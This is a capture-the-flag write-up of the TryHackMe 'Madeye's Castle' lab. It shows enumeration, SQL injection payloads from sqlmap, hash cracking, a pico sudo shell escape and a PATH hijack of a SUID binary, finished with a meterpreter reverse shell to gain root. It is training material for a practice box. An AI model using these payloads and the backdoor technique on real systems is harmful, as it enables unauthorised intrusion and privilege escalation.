TryHackMe >> Madeye’s Castle

Table of Content

DESCRIPTION

Have fun storming Madeye’s Castle! In this room you will need to fully enumerate the system, gain a foothold, and then pivot around to a few different users.

ENUM >> NMAP

root@ip-10-10-188-149:~# nmap -sS -sV -oN madeye_init 10.10.136.197

Starting Nmap 7.60 ( https://nmap.org ) at 2021-12-12 05:27 GMT
Nmap scan report for ip-10-10-136-197.eu-west-1.compute.internal (10.10.136.197)
Host is up (0.013s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:C4:11:EB:67:87 (Unknown)
Service Info: Host: HOGWARTZ-CASTLE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.52 seconds

ENUM >> FeroxBuster (common.txt)

❯ feroxbuster -u http://10.10.136.197/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.4.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.136.197/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.4.0
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403        9l       28w      278c http://10.10.136.197/.hta
403        9l       28w      278c http://10.10.136.197/.htaccess
403        9l       28w      278c http://10.10.136.197/.htpasswd
301        9l       28w      315c http://10.10.136.197/backup
403        9l       28w      278c http://10.10.136.197/backup/.hta
403        9l       28w      278c http://10.10.136.197/backup/.htaccess
403        9l       28w      278c http://10.10.136.197/backup/.htpasswd
200      375l      969w    10965c http://10.10.136.197/index.html
200       43l      258w     1527c http://10.10.136.197/backup/email
403        9l       28w      278c http://10.10.136.197/server-status
[####################] - 33s     9404/9404    0s      found:10      errors:0
[####################] - 28s     4702/4702    167/s   http://10.10.136.197/
[####################] - 27s     4702/4702    172/s   http://10.10.136.197/backup

ENUM >> /backup/email

  • This looks to be a big hint pointing towards vhosts… we also see HOGWARTZ-CASTLE mentioned in the NMAP scan…
Madeye,

It is done. I registered the name you requested below but changed the "s" to a "z". You should be good to go.

RME

--------
On Tue, Nov 24, 2020 at 8:54 AM Madeye Moody <ctf@madeye.ninja> wrote:
Mr. Roar M. Echo,

Sounds great! Thanks, your mentorship is exactly what we need to avoid legal troubles with the Ministry of Magic.

Magically Yours,
madeye

--------
On Tue, Nov 24, 2020 at 8:53 AM Roar May Echo <info@roarmayecho.com> wrote:
Madeye,

I don't think we can do "hogwarts" due to copyright issues, but let's go with "hogwartz", how does that sound?

Roar

--------
On Tue, Nov 24, 2020 at 8:52 AM Madeye Moody <ctf@madeye.ninja> wrote:
Dear Mr. Echo,

Thanks so much for helping me develop my castle for TryHackMe. I think it would be great to register the domain name of "hogwarts-castle.thm" for the box. I have been reading about virtual hosting in Apache and it's a great way to host multiple domains on the same server. The docs says that...

> The term Virtual Host refers to the practice of running more than one web site (such as 
> company1.example.com and company2.example.com) on a single machine. Virtual hosts can be 
> "IP-based", meaning that you have a different IP address for every web site, or "name-based", 
> meaning that you have multiple names running on each IP address. The fact that they are 
> running on the same physical server is not apparent to the end user.

You can read more here: https://httpd.apache.org/docs/2.4/vhosts/index.html

What do you think?

Thanks,
madeye
  • Sure enough! Setting up our /etc/hosts to point the target IP to hogwartz-castle.thm reveals a login page when we visit the URL: http://hogwartz-castle.thm

ENUM >> samba

  • Running enum4linux we get a few tidbits of information:
[+] Attempting to map shares on hogwartz-castle.thm

//hogwartz-castle.thm/sambashare        Mapping: OK Listing: OK Writing: N/A

...

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1001 Unix User\harry (Local User)
S-1-22-1-1002 Unix User\hermonine (Local User)
  • First things first, let’s check out that share:
❯ smbclient \\\\10.10.136.197\\sambashare
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\stimpz]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 12:19:20 2020
  ..                                  D        0  Thu Nov 26 11:57:55 2020
  spellnames.txt                      N      874  Thu Nov 26 12:06:32 2020
  .notes.txt                          H      147  Thu Nov 26 12:19:19 2020

                9219412 blocks of size 1024. 4394760 blocks available
smb: \> get spellnames.txt
getting file \spellnames.txt of size 874 as spellnames.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> get .notes.txt
getting file \.notes.txt of size 147 as .notes.txt (0.1 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
LOOT >> .notes.txt
Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.

ENUM >> SQLi!

While waiting for Hydra to brute-force the login form (dead-end) I tried a quick SQL injection on the user field of the login page… this is the response I got!

{"error":"The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection... keep digging"}
  • Time to throw sqlmap at the login form:
❯ sqlmap -r ~/tryhackme/ctf/madeyes_castle/requests --risk=3 --level=5 --random-agent --dump-all

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.9#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[18:58:53] [INFO] POST parameter 'user' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=403)
[18:59:02] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
[18:59:17] [INFO] POST parameter 'user' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: user=-1478' OR 7741=7741-- QefG&password=password

    Type: time-based blind
    Title: SQLite > 2.0 OR time-based blind (heavy query)
    Payload: user=harry' OR 1584=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- RCQw&password=password
---
[19:00:23] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: SQLite

[19:34:08] [INFO] retrieving the length of query output
[19:34:08] [INFO] retrieved: 1
[19:34:10] [INFO] retrieved: 0
[19:34:13] [INFO] retrieving the length of query output
[19:34:13] [INFO] retrieved: 12
[19:34:23] [INFO] retrieved: Harry Turner
[19:34:23] [INFO] retrieving the length of query output
[19:34:23] [INFO] retrieved: 60
[19:34:50] [INFO] retrieved: My linux username is my first name, and password uses best64
[19:34:50] [INFO] retrieving the length of query output
[19:34:50] [INFO] retrieved: 128
[19:35:47] [INFO] retrieved: <REDACTED>

PRIVESC >> harry’s password = SSH!

  • Throwing the hash we found at john with that world-famous wordlist rockyou.txt we get a hit!
❯ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA512 --rules=best64 creds.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 128/128 AVX 2x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (?)
1g 0:00:01:54 DONE (2021-12-12 20:17) 0.008737g/s 3388Kp/s 3388Kc/s 3388KC/s yaziel123..whoabuddy123
Session completed
  • Hopefully harry is stupid enough to use the same password on his shell account:
❯ ssh harry@hogwartz-castle.thm
harry@hogwartz-castle.thm's password:
 _      __    __                     __         __ __                          __
 | | /| / /__ / /______  __ _  ___   / /____    / // /__  ___ __    _____ _____/ /____
 | |/ |/ / -_) / __/ _ \/  ' \/ -_) / __/ _ \  / _  / _ \/ _ <code>/ |/|/ / _ / __/ __/_ /
 |__/|__/\__/_/\__/\___/_/_/_/\__/  \__/\___/ /_//_/\___/\_, /|__,__/\_,_/_/  \__//__/
                                                        /___/

Last login: Thu Nov 26 01:42:18 2020
harry@hogwartz-castle:~$

PRIVESC (lateral) >> hermonine

  • Let’s check out our sudo access since we have a password…
harry@hogwartz-castle:/home$ sudo -l
[sudo] password for harry:
Matching Defaults entries for harry on hogwartz-castle:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User harry may run the following commands on hogwartz-castle:
    (hermonine) /usr/bin/pico
    (hermonine) /usr/bin/pico

harry@hogwartz-castle:/home$ sudo -u hermonine /usr/bin/pico
  • Good, with pico all we need to do is hit Ctrl-R & Ctrl-X once it loads and we get a "Command to execute:" prompt. If we type reset; bash 1>&0 2>&0 we can break out into a shell:
hermonine@hogwartz-castle:/home$

PRIVESC >> root via SUID /srv/time-turner/swagger

  • There is a binary named swagger installed on the box, a custom SUID binary that has 2 major flaws – it uses time to get it’s "random" number (that you are expected to guess), and also conveniently calls uname without a path. If we change our path to the same folder as the executable (it’s writeable), then using some command piping to beat the random number by quickly grabbing the result and re-running it to get it the correct answer (timing attack).
hermonine@hogwartz-castle:/srv/time-turner$ export PATH=/srv/time-turner:$PATH
hermonine@hogwartz-castle:/srv/time-turner$ echo '111' | /srv/time-turner/swagger | grep "of" | cut -f5 -d' ' | /srv/time-turner/swagger ;
  • For the replacement of uname I simply slipped in a meterpreter backdoor… all the usual "quick" methods would either lose the root privileges or fail for some other weird reasons (incorrect fd descriptors?!)…
[*] Meterpreter session 1 opened (10.4.54.194:4444 -> 10.10.116.144:49146) at 2021-12-12 22:12:12 +1100

meterpreter > getuid
Server username: root
meterpreter > ls
Listing: /srv/time-turner
=========================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
104755/rwxr-xr-x  8816  fil   2020-11-26 12:06:32 +1100  swagger
100775/rwxrwxr-x  250   fil   2021-12-12 22:11:45 +1100  uname

meterpreter > cd /root
meterpreter > ls
Listing: /root
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
20666/rw-rw-rw-   0     cha   2021-12-12 18:35:51 +1100  .bash_history
100644/rw-r--r--  3106  fil   2020-11-26 11:32:40 +1100  .bashrc
40700/rwx------   4096  dir   2020-11-26 12:17:20 +1100  .cache
100640/rw-r-----  336   fil   2020-11-26 12:48:38 +1100  .credits.txt
40700/rwx------   4096  dir   2020-11-26 12:17:20 +1100  .gnupg
100644/rw-r--r--  148   fil   2020-11-26 11:32:40 +1100  .profile
40700/rwx------   4096  dir   2020-11-26 12:44:11 +1100  .ssh
100600/rw-------  38    fil   2020-11-26 12:06:32 +1100  root.txt



Leave a Reply

Your email address will not be published.